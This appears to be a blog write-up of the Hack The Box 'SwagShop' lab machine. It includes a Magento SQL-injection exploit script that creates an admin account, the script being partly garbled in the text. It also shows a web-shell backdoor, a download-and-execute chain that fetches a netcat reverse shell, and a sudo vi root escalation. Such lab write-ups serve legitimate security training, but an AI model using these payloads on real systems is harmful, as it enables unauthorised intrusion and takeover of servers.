HTB: SwagShop


This machine is Swag Shop from Hack The Box


root@kali:~# nmap -sV -p- -T4
Starting Nmap 7.70 ( ) at 2019-05-30 16:46 BST
Nmap scan report for
Host is up (0.034s latency).
Not shown: 65533 closed ports
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 23.28 seconds

The Box

So off to the web server

Screenshot 1

It is magento, some googling led to CVE-2015-1397,, I saved and modified it to point at the target. And use different creds for the created user. But the exploit didn't work straight away. It seemed a URL used in the exploit was not present


Screenshot 2

Some more googling led to an updated path o


Leading to and overall script of

import requests
import base64
import sys

target = ""

if not target.startswith("http"):
    target = "http://" + target

if target.endswith("/"):
    target = target[:-1]

target_url = target + "/index.php/admin/Cms_Wysiwyg/directive/index/"

SET @SALT = 'rp';
SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','[email protected]','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');

query = q.replace("\n", "").format(username="jirbjAdmin", password="jirbjPassword")
pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)

# e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is{{block type=Adminhtml/report_search_grid output=getCsvFile}}
r =,
                  data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
                        "filter": base64.b64encode(pfilter),
                        "forwarded": 1})
if r.ok:
    print "WORKED"
    print "Check {0}/admin with creds".format(target)
    print "DID NOT WORK"

So I ran it

root@kali:~# python

And logged in with the created creds at

Screenshot 3

Screenshot 4

Which led to

Screenshot 5

I logged in again

Screenshot 6

So I found a module to upload

NOTE: Untick the following box it stops the machine 503ing all the time

Screenshot 7

I ended up using a backdoor I found on github

Screenshot 8

Screenshot 9

Now test it with curl

root@kali:~# curl -X POST -d "c=id"
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Reverse shell time

root@kali:~# nc -nvlp 4444

But none of my normal ones worked, so I made it download a script, first checking wget was available

root@kali:~# curl -X POST -d "c=which wget"

So I created a file with the following in, called

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444 >/tmp/f

I exposed this with a web server and made the target download, chmod and execute it

root@kali:~# curl -X POST -d "c=wget -O /tmp/"

root@kali:~# curl -X POST -d "c=chmod +x /tmp/"

curl -X POST -d "c=sh /tmp/"

Then back in the listener

connect to [] from (UNKNOWN) [] 59422
/bin/sh: 0: can't access tty; job control turned off

I upgraded my shell

$ python3 -c "import pty;pty.spawn('/bin/bash')"

A quick check of sudo

www-data@swagshop:/var/www/html$ sudo -l
Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass,

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*

I can run vi as root as long as it is in /var/www/html, so I ran

www-data@swagshop:/var/www/html$ sudo vi /var/www/html/jirbj

Once in vi, I used it to run sh


I got my root shell

# id
uid=0(root) gid=0(root) groups=0(root)

Time to grab the flags

# cd /home
# ls -la
drwxr-xr-x  3 root  root  4096 May  2 14:48 .
drwxr-xr-x 23 root  root  4096 May  2 14:55 ..
drwxr-xr-x  3 haris haris 4096 May  8 09:21 haris

# cd haris
# ls -la
drwxr-xr-x 3 haris haris 4096 May  8 09:21 .
drwxr-xr-x 3 root  root  4096 May  2 14:48 ..
-rw------- 1 haris haris   54 May  2 14:56 .Xauthority
lrwxrwxrwx 1 root  root     9 May  8 09:20 .bash_history -> /dev/null
-rw-r--r-- 1 haris haris  220 May  2 14:48 .bash_logout
-rw-r--r-- 1 haris haris 3771 May  2 14:48 .bashrc
drwx------ 2 haris haris 4096 May  2 14:49 .cache
-rw------- 1 root  root     1 May  8 09:20 .mysql_history
-rw-r--r-- 1 haris haris  655 May  2 14:48 .profile
-rw-r--r-- 1 haris haris    0 May  2 14:49 .sudo_as_admin_successful
-rw-r--r-- 1 haris haris   33 May  8 09:01 user.txt

# cat user.txt

# cd /root
# ls -la
drwx------  3 root root 4096 May  8 09:21 .
drwxr-xr-x 23 root root 4096 May  2 14:55 ..
-rw-r--r--  1 root root 3106 Oct 22  2015 .bashrc
drwxr-xr-x  2 root root 4096 May  2 14:50 .nano
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-------  1 root root  270 May  8 09:01 root.txt

# cat root.txt

   ___ ___
 /| |/|\| |\
/_| ยด |.` |_\           We are open! (Almost)
  |   |.  |
  |   |.  |         Join the beta HTB Swag Store!

                   PS: Use root flag as password!

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.